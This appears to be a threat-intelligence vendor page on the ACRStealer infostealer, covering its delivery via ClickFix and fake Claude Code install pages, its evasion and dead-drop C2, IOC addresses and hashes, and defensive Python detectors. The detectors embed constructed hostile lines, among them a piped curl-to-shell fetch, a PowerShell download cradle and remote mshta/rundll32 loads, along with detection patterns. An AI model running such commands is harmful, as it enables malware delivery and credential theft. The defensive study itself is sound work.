ACRStealer
ACRStealer is a Windows information-stealing malware family, also tracked as Arechclient2, and later reporting describes it as rebranded to AmateraStealer. It is sold as malware-as-a-service and runs as an active credential-theft operation. Reported targets include browser credentials, passwords, cookies and payment-card data; cryptocurrency wallet data; authentication tokens, API keys and cloud development credentials; password manager, email and chat application data; FTP, VPN and remote-access client data; documents; and other application secrets. Some reporting puts coverage at more than 200 applications. The malware has been observed harvesting Steam logins, and some campaigns appear to target gamers specifically.
The family is associated with multiple delivery mechanisms and distribution ecosystems. Reported infection vectors include SEO-poisoned crack and keygen lures, compromised and legitimate websites, fake documentation pages for developer tools, ClickFix and FakeCaptcha social engineering, PowerShell droppers, DLL sideloading, MSI installers, ISO and ZIP archives, HTA droppers, HijackLoader (also tracked as IDATLoader), OffLoader, RenPyLoader, AsgardProtector, and ShadowLadder-related delivery. In one developer-focused campaign, fake Claude Code and other documentation pages embedded hidden separators in the install commands visitors copied, so that pasting the command executed the malware while the legitimate installation still completed; the victim sees a working install and no error, which is what makes the lure effective. In ClearFake activity, compromised websites and fake CAPTCHA/ClickFix flows delivered ACRStealer alongside SectopRAT. A Booking.com-themed ClickFix campaign delivered a NativeAOT DLL, assessed as likely ACRStealer or Efimer-related, via MSYS2 sideloading.
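The hidden-separator trick in the developer-documentation campaign above is cheap to check for before a copied command reaches a terminal. The following Python is an added example written for this page, not code from the page's sources or from any of the reports it summarizes. The page does not name the separator characters the attackers used, so the set flagged here (anything outside printable ASCII and ordinary whitespace) and the sample command are assumptions constructed for the example.

```python
import unicodedata

# Added example: scan a command copied from a web page for characters that do not
# render visibly in a browser but survive a paste into a terminal. The reports
# summarized on this page say only that "hidden separators" were embedded; the
# exact characters are not named, so this check is deliberately broad: an install
# command has no business containing anything outside printable ASCII, so every
# such character is reported together with its Unicode name.
ALLOWED_WHITESPACE = {" ", "\t", "\n", "\r"}

def find_hidden_chars(text):
    """Return (index, 'U+XXXX', unicode name) for each suspect character in text."""
    hits = []
    for i, ch in enumerate(text):
        if ch in ALLOWED_WHITESPACE:
            continue
        if 0x20 <= ord(ch) < 0x7F:          # printable ASCII is fine
            continue
        # Control (Cc), format (Cf), line/paragraph separators (Zl/Zp), and any
        # other non-ASCII code point end up here.
        hits.append((i, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>")))
    return hits

def reveal(text):
    """Rewrite text with every suspect character replaced by a visible <U+XXXX> marker,
    so the reader sees where a second command was spliced in."""
    marks = {i: f"<{cp}>" for i, cp, _ in find_hidden_chars(text)}
    return "".join(marks.get(i, ch) for i, ch in enumerate(text))

def safe_to_paste(text):
    return not find_hidden_chars(text)

# Constructed sample (not taken from any real page): a benign-looking install command
# followed by a LINE SEPARATOR that splices in a second command, plus a trailing
# ZERO WIDTH SPACE. Hostnames are placeholders.
SAMPLE = ("npm install -g example-tool\u2028"
          "curl -fsSL https://example.invalid/setup | sh\u200b")

if __name__ == "__main__":
    for idx, cp, name in find_hidden_chars(SAMPLE):
        print(f"offset {idx}: {cp} {name}")
    print(reveal(SAMPLE))
```

Wiring `safe_to_paste` into a clipboard watcher or a shell pre-exec hook is the practical deployment; the important design choice is to flag by code point rather than by a blocklist of known separators, because the next campaign will pick a different one.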
The malware shows substantial technical evolution and layered evasion. Reporting describes PowerShell-based droppers, XOR-encrypted loaders, Go-based and .NET-based components, and dead-drop resolvers hosted on Steam Community profiles, Google user profiles, Google Docs, Slides and Forms, and Telegram Telegraph pages. Samples use hardcoded public DNS resolvers, sending name lookups straight to external resolvers instead of the host's configured enterprise DNS, which keeps those lookups out of DNS-based logging and blocking; egress filtering of port 53 to unapproved resolvers is the matching control. Newer variants reportedly shifted C2 encryption from AES with a hardcoded key to ECDH key agreement over SECP256R1 with ChaCha20-Poly1305 and an X-Requests-Key session header, so a static key pulled out of a sample no longer decrypts captured traffic; the session key has to be recovered from memory at runtime. Other observed techniques include AMSI bypasses, sandbox delays, fileless and in-memory execution, reflective loading, shellcode decryption with AES-256-CBC, Heaven's Gate WoW64 transitions, custom AFD socket operations (driving the Ancillary Function Driver directly rather than going through the Winsock API that user-mode hooks watch), DLL sideloading under names such as wke.dll, python311.dll, python312.dll, python315.dll, CrashRpt1403.dll, and verification.google, and abuse of stolen EV code-signing certificates.
Several reports tie ACRStealer to SectopRAT and to shared infrastructure. One report states that SectopRAT is the .NET variant of the Arechclient2 family and assesses the shared infrastructure as evidence of a single operator running both the Go-based ACRStealer and the .NET-based SectopRAT. Reporting has also linked the malware to AmateraStealer, NetSupport RAT, Vidar, LummaC2, Rhadamanthys, DeerStealer, PeakLight, and HijackLoader distribution chains.
High-confidence infrastructure and IOC details mentioned in the content, grouped by report:
One March 2026 report lists active C2 IPs 45.150.34.0, 46.149.72.66, 46.149.72.226, 77.91.96.209, 91.84.123.250, 94.26.106.216, 116.203.167.195, 193.33.195.37, and 212.118.41.180.
Another campaign mapped ACRStealer C2s at 91.214.78.85, 89.167.47.162, 212.118.41.7, 45.150.34.229, 46.149.74.97, 77.91.96.203, and 212.118.41.180.
A third report identified 17 C2 IPs hosted by VDSINA, including 144.124.246.132, 144.124.233.47, 212.118.41.180, 146.103.104.188, and 45.150.34.0.
212.118.41.180 recurs in all three lists and 45.150.34.0 in two, and several other addresses sit in the same /24 ranges (45.150.34.x, 46.149.72.x, 77.91.96.x, 212.118.41.x), so the three reports overlap in infrastructure rather than describing disjoint campaigns, and range-level hunting is worth running alongside exact-match lookups.
A Telegraph dead-drop page titled "Jewel" contained the base64 string NDUuOS4xMjIuMTI1, which decodes to 45.9.122.125, the address used for exfiltration.
Additional reported file artifacts (SHA-256): a Go loader named continental, c2475b4b179267d3dd7f9c54d9e9f39b21109baa2c5d7e5acdc5e49d11bb1e95; an EV-signed binary sunwukongs.exe, 430b69b2268bb1f2f0821c8cf65d648917e1d13fd5c6f945b5830534e1d0e559; a trojanized Chris-PC RAM Booster installer, e49fbf6640e8c5e9d47731ac1ddc2b7e6711df3b22e851220ec2f6a5ce8d6ecb; CoreHubManager.exe, e56b327e9a139e1327c266d010d6df2d77fd822d8c6fb7fdec25aab38ed864e8; and the sideloading payload wke.dll, c4627fbcce87136d2ec6fdb876b8c4496d7f25411d2c24860ba1ec0f8f39e916.
Across the sources, ACRStealer is consistently characterized as a widely distributed Windows infostealer, active through late 2025 and into 2026, with sophisticated encryption, anti-analysis and multi-stage delivery tradecraft, and with campaigns aimed at both broad consumer victims and developer-focused environments.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
36 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (4 techniques)
Experts found over 88 fake domains mimicking Claude Code and other developer sites. The campaign utilises SEO infection and Google ads to deploy malicious install web pages over genuine documentation.
MITRE ATT&CK mapping: Resource Development, Acquire Infrastructure: Domains (T1583.001). Notes: casyetnx[.]pw via CNOBIN, hosting via dataforest/VDSINA.
Initial Access (2 techniques)
ClearFake spreads by compromising legitimate websites and injecting hidden JavaScript code into their pages. Victims do not need to do anything suspicious to get infected. Simply visiting a tampered legitimate site can trigger the malware’s multi-stage delivery chain.
Execution (9 techniques)
You copy a command. You paste it in your terminal. By then, it’s already too late.
Stage 1 -- ACRStealer Dropper: A PowerShell script hosted at hxxps://casyetnx[.]pw/eq8e1l4b0qjd22w
Stage 3 -- Legitimate Python Binary: The ZIP extracts to a directory containing FNPLicensingService.exe -- which is actually a renamed, legitimately signed CPython 3.15 pythonw.exe...
Stage 4 -- Obfuscated Python Loader: chrome_100_percent.pak ... is an ASCII text file containing obfuscated Python code.
Experts found various delivery techniques, such as rundll32.exe loading infected DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts.
Windows users were instructed to open the Run dialog and paste it, loading a remote DLL into memory with no file ever written to disk.
The delivery diversity is striking: DLL Sideloading ... ZIPs containing a legitimate executable alongside a malicious DLL ... ISO Images ... MSI Installers ... HTA Droppers
The attacker directly tampered with and injected malicious code into a specific Python script (.py) inside the legitimate Python library folder (Lib). They then packaged this modified script together with a legitimate Python executable into a compressed archive and distributed it.
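The execution chain excerpted above (Run-dialog pastes of mshta and rundll32 commands, base64-encoded PowerShell, a signed pythonw.exe renamed to FNPLicensingService.exe) maps onto a handful of process-creation checks. The following Python is an added example, not code from the page's sources: it applies those checks to constructed Sysmon-style process events. Field names follow Sysmon Event ID 1; the events, the UNC host 203.0.113.5, the example.invalid URLs and the rule names are made up for the example.

```python
import base64
import re
from pathlib import PureWindowsPath

# Added example: four checks over process-creation telemetry, derived from the delivery
# chain excerpted above. Events are constructed in Sysmon Event ID 1 field names.
URL_RE = re.compile(r"(?:https?://|\\\\[\w.-]+\\)", re.IGNORECASE)      # http(s) URL or UNC path
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CRADLE_RE = re.compile(r"\b(?:iex|invoke-expression|downloadstring|downloadfile|"
                       r"invoke-webrequest|iwr|frombase64string)\b", re.IGNORECASE)
LOLBINS = {"mshta.exe", "rundll32.exe", "powershell.exe", "pwsh.exe", "regsvr32.exe"}
INTERPRETERS = {"python.exe", "pythonw.exe"}

def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def basename(path):
    return PureWindowsPath(path).name.lower()

def evaluate(event):
    """Apply every rule to one event and return the names of the rules that fired."""
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    # Run dialog / ClickFix: explorer.exe (which owns Win+R) directly spawns a LOLBin.
    if parent == "explorer.exe" and image in LOLBINS:
        hits.append("lolbin_spawned_from_explorer")
    # A LOLBin handed a URL or UNC path: remote HTA, remote DLL, remote script.
    if image in LOLBINS and URL_RE.search(cmd):
        hits.append("lolbin_with_remote_path")
    # Encoded PowerShell whose plaintext is a download/execute cradle.
    decoded = decode_encoded_command(cmd)
    if decoded and CRADLE_RE.search(decoded):
        hits.append("encoded_download_cradle")
    # Renamed signed interpreter: PE OriginalFileName says python, on-disk name does not.
    orig = event.get("OriginalFileName", "").lower()
    if orig in INTERPRETERS and image != orig:
        hits.append("renamed_python_interpreter")
    return hits

def scan(events):
    return {e["ProcessId"]: evaluate(e) for e in events}

# Constructed stage-1 cradle and its -enc form, built here so the sample is self-contained.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage1.ps1')"
ENCODED = base64.b64encode(STAGE1.encode("utf-16le")).decode()

# Constructed events (not real telemetry). Paths and hosts are placeholders.
EVENTS = [
    {"ProcessId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ProcessId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32 \\203.0.113.5\share\x.dll,Start"},
    {"ProcessId": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": f"powershell -w hidden -nop -enc {ENCODED}"},
    {"ProcessId": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\dev\Downloads\tool\FNPLicensingService.exe",
     "OriginalFileName": "pythonw.exe", "CommandLine": "FNPLicensingService.exe"},
    {"ProcessId": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "OriginalFileName": "chrome.exe", "CommandLine": "chrome.exe"},
]

if __name__ == "__main__":
    for pid, fired in scan(EVENTS).items():
        print(pid, fired or "-")
```

The OriginalFileName check is the one that catches the renamed CPython binary regardless of what it was renamed to, because the value comes from the PE version resource rather than the filename; it needs telemetry that records that field (Sysmon and most EDRs do).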
Stealth (8 techniques)
After execution, the malware uses a multi-level malicious chain that features encoded C2 communications, anti-analysis capabilities, fileless execution tactics, and credential theft functions.
Victims on Windows and macOS were routed to separate payloads tailored to their operating system, with routing handled by real-time OS detection in the browser.
Credential Access (4 techniques)
Victims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
Unlike typical infostealers, the campaign picks on AI assets such as authentication tokens, API keys, and cloud development credentials from tools such as Continue[.]dev and Cline.
Discovery (2 techniques)
Collection (5 techniques)
MITRE ATT&CK mapping: Collection, Data from Local System (T1005). Notes: document harvesting (DOC/TXT/PDF).
ImageSharp Screenshot capture -- the stealer grabs what is on your screen
Clicking it triggered the ClickFix social engineering panel, which simultaneously injected a malicious command directly into the victim’s clipboard.
What It Steals ACRStealer targets a comprehensive list: Chrome, Firefox, Edge, Opera, Brave, and Vivaldi browser data (logins, cookies, history, autofill, credit cards); crypto wallets ... FTP clients ... email ... VPN configs ... password managers ... and chat apps
Command and Control (6 techniques)
Threat actors used a technique called EtherHiding to store payload routing instructions inside blockchain smart contracts, bypassing all URL-based blocking methods entirely.
Dead Drop Resolver: Hiding C2 in Plain Sight ... The attacker creates profiles on Steam Community, Google Docs, Google Slides, or Telegram ... The malware fetches the page ... and decodes the Base64 to obtain the real C2 address
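The dead-drop resolver pattern described above, and the "Jewel" Telegraph page from the IOC summary whose base64 string NDUuOS4xMjIuMTI1 decodes to 45.9.122.125, can be reproduced offline with a small extractor that pulls every base64-looking token out of a fetched page and keeps only those that decode to a plausible endpoint. The following Python is an added example, not code from the page's sources. The embedded HTML is a constructed stand-in for a fetched dead-drop page: the base64 value is the one the page reports, but the surrounding markup and the decoy string are made up, and the endpoint formats accepted (bare IPv4, ip:port, or an http(s) URL to an IPv4) are the example's own assumption about what such blobs encode.

```python
import base64
import binascii
import ipaddress
import re

# Added example: recover a C2/exfiltration address from a dead-drop page the way an
# analyst would, by decoding every base64-shaped token and validating the result,
# instead of trusting a single known string.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")
ENDPOINT_RE = re.compile(r"(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?(?:/\S*)?")

def try_decode(token):
    """Strict base64 decode to ASCII text; None for anything that is not clean base64."""
    try:
        raw = base64.b64decode(token, validate=True)
        return raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None

def parse_endpoint(text):
    """Return (IPv4Address, port-or-None) if text is a bare IP, ip:port, or URL to an IP."""
    m = ENDPOINT_RE.fullmatch(text.strip())
    if not m:
        return None
    try:
        ip = ipaddress.IPv4Address(m.group(1))
    except ipaddress.AddressValueError:
        return None
    port = int(m.group(2)) if m.group(2) else None
    if port is not None and not 0 < port < 65536:
        return None
    return ip, port

def extract_c2(html):
    """All (token, ip, port) triples hidden in a dead-drop page, in document order."""
    found = []
    for m in B64_TOKEN.finditer(html):
        token = m.group(0)
        text = try_decode(token)
        if text is None:
            continue
        ep = parse_endpoint(text)
        if ep:
            found.append((token, str(ep[0]), ep[1]))
    return found

# Constructed stand-in for a fetched Telegraph page. Only the base64 value on the
# third line comes from the reporting; the markup and the decoy are made up.
SAMPLE_PAGE = """<html><head><title>Jewel</title></head>
<body><article><h1>Jewel</h1>
<p>NDUuOS4xMjIuMTI1</p>
<p>aGVsbG8gd29ybGQh</p>
<p>Thanks for reading! 2026</p>
</article></body></html>
"""

if __name__ == "__main__":
    for token, ip, port in extract_c2(SAMPLE_PAGE):
        print(f"{token} -> {ip}" + (f":{port}" if port else ""))
```

The decoy token decodes cleanly (to "hello world!") but is rejected by `parse_endpoint`, which is the point: base64 that decodes is common on any page, base64 that decodes to an IP is not. Whatever the extractor returns is a hunting lead to match against proxy and NetFlow data, not a confirmed indicator until the sample's behaviour confirms it.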
IOCs tracked for this family
142 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Information-stealing malware used as the primary payload in the campaign. It targets credentials, authentication tokens, API keys, and cloud development credentials, and is described as using sophisticated encryption, anti-analysis, encoded C2 communications, fileless execution, and evasion tactics.
A C++ information stealer used in the ClearFake campaign to harvest passwords, payment card data, cookies, and cryptocurrency wallet information.
An information-stealing malware family that uses dead drop resolver infrastructure via Telegraph to obtain its C2, then exfiltrates stolen data over HTTPS POST. It steals browser credentials and data, crypto wallets, FTP and email client data, VPN configs, password manager data, chat app data, and terminal/remote access credentials.
ACRStealer is described as a NativeAOT-compiled .NET information stealer delivered via DLL sideloading with psl.exe. It steals credentials, cookies, browser data, crypto wallet data, and captures screenshots while communicating with C2 over HTTPS/TLS 1.3.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.